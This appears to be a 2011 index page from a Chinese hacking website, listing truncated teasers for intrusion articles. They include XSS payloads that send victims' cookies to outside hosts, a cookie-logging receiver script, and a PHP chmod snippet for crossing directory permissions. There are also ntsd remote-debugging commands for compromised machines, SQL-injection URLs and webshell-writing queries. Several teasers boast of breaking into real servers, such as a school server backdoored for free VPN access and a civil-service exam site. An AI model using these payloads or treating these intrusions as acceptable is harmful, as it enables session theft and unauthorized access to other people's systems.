|
|
用IIS6.0的文件解析缺陷留后门
|
|
日期:2011-05-26 13:56:44
点击:658 评论:0
|
By:乱雪 IIS对文件解析可以用ISAPI扩展。上传漏洞中,经典的asa、cer、cdx扩展名上传拿webshell都是因为默认情况下,IIS对其后缀名映射到了asp.dll,asp.dll又是ASP脚本的解析文件。 最近没钱,为了免费上网,拿了学校服务器权限开VPN,为了在服务器里持久留个缺陷方 |
|
|
Mysql跨库入侵介绍
|
|
日期:2011-05-17 11:24:35
点击:73 评论:0
|
入侵假想: 目标是A站点,安全性比较可以。但是在同服务器下的B站点,我们发现了一个Mysql 注入点,并且还有查询相关库的权限。 那么,我们就可以通过B站点的注入点跨库查询A站点的信息,入侵之.. (当然你也可以把B站点入侵了,再入侵A。但不是有注入点就可以入侵的, |
|
|
入侵纽约大学过程
|
|
日期:2011-05-17 11:23:40
点击:100 评论:0
|
一 原理分析 我看看mysql5比之前增加的系统数据库information_schema的结构,它是用来存储数据库系统信息的 mysql use information_schema; Database changed mysql show tables; +---------------------------------------+ | Tables_in_information_schema | +------- |
|
|
Firefox攻击技巧总结
|
|
日期:2011-05-17 11:22:31
点击:80 评论:0
|
在阅读《ClubHACK》黑客杂志时,看到一篇关于Firefox浏览器攻击手法的文章, 标题为《Mozilla Firefox Internals Attack Strategies》,里面提供有多份javascript代码, 用于实现Firefox浏览器下的脚本攻击。本文对此作个简单记录留作备忘, 以后需要用到时方便回头查 |
|
|
linux不提权跨目录访问的代码
|
|
日期:2011-05-12 10:39:24
点击:145 评论:0
|
inux权限多设的比较松的其实,但有的虚拟机还是不能跨目录访问的。 在提不了权的情况下,试试如下代码吧。运气好的话说不定就跨过去了。 代码如下: ?php $path = stripslashes($_GET['path']); $ok = chmod ($path , 0777); if ($ok == true) echo CHMOD OK , Permiss |
|
|
1433终极入侵之沙盒模式
|
|
日期:2011-05-12 10:38:36
点击:101 评论:0
|
1433好扫,但是难入侵啊! 不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。 哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办? 或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道 |
|
|
微软的“后门”:NTSD.exe,的远程调试功能利用
|
|
日期:2011-05-09 17:04:26
点击:125 评论:0
|
1.肉鸡上运行:ntsd -server tcp:port=端口 要调试的程序(可以任意,只要存在即可),例如:ntsd -server tcp:port=99 calc.exe,会新弹出个窗口,并监听刚才设置端口。 2.本机运行:ntsd -remote tcp:server=IP,port=端口,例如:ntsd -remote tcp:server=192.168.1. |
|
|
xss跨站脚本攻击大全
|
|
日期:2011-05-09 16:58:47
点击:237 评论:0
|
(1)普通的XSS JavaScript注入 SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT (2)IMG标签XSS使用JavaScript命令 SCRIPT SRC=http://3w.org/XSS/xss.js/SCRIPT (3)IMG标签无分号无引号 IMG SRC=javascript:alert(XSS) (4)IMG标签大小写不敏感 IMG SRC=JaVaScRiPt:alert(XS |
|
|
Xss获取管理员后台地址实战
|
|
日期:2011-05-06 12:00:19
点击:325 评论:0
|
作者:Trojan [ESST] 信息来源: 噩靈戰隊[Evil-Soul Security Team] http://bbs.x-xox-x.com/thread-793-1-1.html 前段时间在开游戏支付平台,开始拿到代码的时候看了一下,没找到注入漏洞,就索性以为很安全.代码如下复制内容到剪贴板代码: !--#include file=inc/conn.asp |
|
|
XSS(跨站)偷cookie的代码
|
|
日期:2011-05-06 11:59:54
点击:321 评论:0
|
scriptdocument.write('img src=http://url/news.asp?msg='+document.cookie+' width=0 height=0 border=0 /');/script news.asp代码: % msg=Request.ServerVariables(QUERY_STRING) testfile=Server.MapPath(cook.txt) set fs=server.CreateObject(scripting.filesys |
|
|
XSS偷取密码Cookies通用脚本
|
|
日期:2011-05-06 11:59:05
点击:2797 评论:0
|
很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。 今天写个通用脚本工具 文件如下 asp.asp或者php.php 或者cookies.htm效果如下 保存文本 发送邮件 获取的cookies 截获用户名密码 主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱 内 |
|
|
XSS漏洞基本攻击代码
|
|
日期:2011-05-06 11:58:42
点击:2627 评论:5
|
javascript scriptalert(document.cookie);/script scriptdocument.location.replace('http://www.20060801.com/xss/getcookie.php?c='+document.cookie);/script document.write('img src=http://www.20060801.com/xss/getcookie.php?c='+document.cookie+' width=0 h |
|
|
渗透校内网——XSS过程详解
|
|
日期:2011-05-04 14:56:42
点击:182 评论:0
|
余弦函数 ( http://hi.baidu.com/ycosxhack )三更半夜原创 我知道校内网曾经爆发的那个蠕虫,那时候爆发这个相对来说容易,因为那时XSS没任何挑战,而AJAX蠕虫不是谁都可以写出来的,至少要有不错的JavaScript编程能力。我是这两天才开始认真使用校内网的,使用前就 |
|
|
mysql可多语句执行下不用单引号outfile写shell
|
|
日期:2011-05-04 14:56:16
点击:323 评论:0
|
mysql use xssdb; Database changed mysql set @a=0x73656C6563742030783343334637303638373032303430363537363631364332 38323435463530344635333534354232373633364436343237354432393342334633452066726F6D 20787373206C696D6974203120696E746F206F757466696C652027 |
|
|
高级PHP手工注入
|
|
日期:2011-05-04 14:55:17
点击:97 评论:0
|
1.判断版本 http://www.xxxx.com/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))51 返回正常,说明大于4.0版本,支持ounion查询 2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解 http://www.xxxx.com/document/advisory/deta |
|
|
入侵 www.gongwuyuan.com.cn (中国公务员考试中心) 全过程
|
|
日期:2011-04-20 14:31:50
点击:191 评论:0
|
入侵这个网站也是一个偶然的机会,我朋友要考公务员想要下载一些资料,但是很多都是会员才能下载到的资料。她找到我让我帮她搞个账号,妹子开口总不能拒绝把。 1.webshell 打开网站,大致看一眼。网站上前台的页面基本上都已经生成了静态页面(估计是dede或者是phpwind |
|
|
KesionCMS V7.0科汛内容网站管理系统拿webshell
|
|
日期:2011-04-18 10:28:35
点击:2495 评论:0
|
KesionCMS V7是漳州科兴信息技术有限公司采用ASP与(Access 2003)SQL Server2000开发的一款万能建站产品,前后已更新过7个大版本及数十个小版本。是目前国内最强的ASP的开源系统。其下内置10几个子产品,包括文章、图片、下载、动漫、问答、商城、供求、音乐、影视、 |
|
|
站长内容联盟后台Cookie欺骗漏洞利用
|
|
日期:2011-04-18 10:27:59
点击:57 评论:0
|
站长内容联盟是国内使用最广泛的一套小偷程序,但是其后台验证不严格,通过cookie欺骗,可以绕过验证直接进入后台,拿到webshell。网站内容联盟,想必大多数站长都是知道的,或许都加入过一个或多个联盟。或许有些新人不了解,这里还是简单介绍一下网站内容联盟的特点 |
|
|
入侵检测三级跳 解析跳板技术
|
|
日期:2011-04-14 09:39:57
点击:82 评论:0
|
【IT专家网独家】 网络入侵,安全第一。一个狡猾的、高明的入侵者,不会冒然实行动。他们在入侵时前会做足功课,入侵时会通过各种技术手段保护自己,以防被对方发现,引火烧身。其中,跳板技术是攻击者通常采用的技术。下面笔者结合实例,解析攻击入侵中的跳板技术。 1 |
|
|
浅谈跨域WEB攻击
|
|
日期:2011-04-11 14:05:59
点击:123 评论:0
|
浅谈跨域web攻击 EMail: rayh4c#80sec.com Site: http://www.80sec.com Date: 2011-04-07 From: http://www.80sec.com 000 前言 一直想说说跨域web攻击这一概念,先前积累了一些案例和经验,所以想写这么一篇文档让大家了解一下跨域web攻击,跨域web攻击指的是利用网站 |
|
|
|
|
本月热点文章 |
|
|
|
|
|
本月推荐文章 |
|
|
|
|
|
相关分类 |
|
|
|
|